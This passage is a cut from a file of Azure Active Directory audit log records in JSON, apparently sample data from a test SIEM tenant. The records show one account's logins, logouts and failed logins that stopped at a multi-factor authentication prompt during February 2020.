"UserStrongAuthClientAuthNRequiredInterrupt", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Failed", "IntraSystemId": "7fa5e138-ac87-4063-a278-56c6c6965e00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "FlowTokenScenario", "Value": "Login"}, {"Name": "UserAuthenticationMethod", "Value": "1"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoginFailed", "Id": "82d834e4-f6f2-476a-902e-e1e9fd6f87d8"} -{"InterSystemsId": "6b9a8662-857f-45e4-bbb2-d106d5aab41e", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:19", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "79.159.10.151", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "0fee3b91-5e56-45f6-9b3c-792602b1e500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": 
"e5e2c41a-55ea-4681-9d64-78ddd7145bd2"} -{"InterSystemsId": "6bab76a8-98bd-42e4-b722-a31fe81b030a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:40", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c3ebcde8-62f6-4cc4-8e0c-c11c08e76100", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "2a23206a-2f5d-4cb7-aeb8-f285d10e6f80"} -{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:30:58", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "83.57.233.151", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": 
"AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "8b270c82-1240-4a0a-ac15-1e1116261400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "c0a0d198-825b-4e39-b868-0a7b0552b209"} -{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:31:33", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "LogonError": "UserStrongAuthClientAuthNRequiredInterrupt", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Failed", "IntraSystemId": "b0faaf7a-913e-4a93-8ccc-ecfaa2b42400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "FlowTokenScenario", "Value": "Login"}, {"Name": "UserAuthenticationMethod", "Value": "1"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoginFailed", "Id": "52b07191-3887-40fb-a001-f4122b0851d1"} -{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:14:25", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "83.57.233.151", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d949d6c2-472e-4901-bd70-96cbfe534c00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "c62fa78d-daab-494e-a638-8321ebd71b9e"} -{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:14:51", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "LogonError": "UserStrongAuthClientAuthNRequiredInterrupt", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": 
"AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Failed", "IntraSystemId": "42c7ec91-1e2f-4505-b728-3a165b244f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "FlowTokenScenario", "Value": "Login"}, {"Name": "UserAuthenticationMethod", "Value": "1"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoginFailed", "Id": "73c76212-8120-4e21-a383-c80d8327b606"} -{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:29:56", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "8b8e8663-8a8c-4959-a692-e3eece085300", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": 
"Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "29f94716-3717-4671-962e-9c739b764f07"} -{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:51:23", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "361dd87e-3bc9-4f0a-b236-ed7365e28d00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "17d02385-1e30-45b7-949c-4d3dd549a0e7"} -{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:39:45", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": 
"79.159.10.151", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "79.159.10.151", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "32b4cec1-00eb-44ea-be73-adc82387db00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e3346dd0-ecf6-4676-8765-365c7370b6fe"} -{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:40:16", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "LogonError": "UserStrongAuthClientAuthNRequiredInterrupt", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Failed", "IntraSystemId": "a063e495-5883-4837-8186-582817fdd500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "FlowTokenScenario", "Value": "Login"}, {"Name": 
"UserAuthenticationMethod", "Value": "1"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoginFailed", "Id": "a772fd76-847f-4703-90f1-37eb81c9f392"} -{"InterSystemsId": "7766ac63-ae7f-43e6-868a-a5422a96fd8b", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-08T14:33:52", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "37.29.234.179", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "37.29.234.179", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "adc9d69c-8ae6-41c7-b685-331453060a00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "487e4f43-53db-4d6f-a314-5355746d4853"} -{"InterSystemsId": "781c1055-e731-48ee-a806-c3f39ba160e3", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:53:24", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, 
{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "e7fe21ea-ec03-46dd-b272-0a72ebbeac00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "41f6b2dc-4db6-444c-93d9-829a842b87e2"} -{"InterSystemsId": "82b07417-7b33-4531-952f-d3f719e2356a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:22", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], 
"ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "280b3410-9d51-4ce3-952d-5bba0bea6600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "ec9fa29b-6201-456d-b228-ca1759e0bf6c"} -{"InterSystemsId": "8571fe85-eb4a-430d-b468-97900e344923", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-06T09:28:04", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "83.57.233.151", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d239e473-6687-4ff9-ac65-0e3c59961600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e988fd90-2eff-4ad7-9f02-030a9d73ad6e"} -{"InterSystemsId": "8d662bc0-0011-424d-a7dc-56bfc5a142b4", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:35", "Actor": [{"Type": 0, "ID": 
"755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d0a4e1ed-206d-4602-aaae-406a02c5c300", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3cbf15a5-84d0-4b0e-ba8e-c3ed43477293"} -{"InterSystemsId": "9270f20a-56f2-493e-b6a7-a859adcaf626", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:36", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": 
"00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "97aa710f-536f-44c8-a8d5-711dc55f5500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d2bb7eae-bc6e-42d2-b270-a885ec626235"} -{"InterSystemsId": "97c52753-c410-438f-89e2-22741e5ccc6a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:51:49", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c9ef5d5f-e3af-4669-b465-921d8b58bd00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "03de6d95-b955-451c-8311-473b6853d774"} -{"InterSystemsId": "9e0a494b-0db0-4481-a70e-eea6124b7018", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:37", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "e48d4214-364e-4731-b2b6-47dabf529218", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000004-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000004-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "e7a84bcf-41ff-4953-8e99-fb1820685f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": 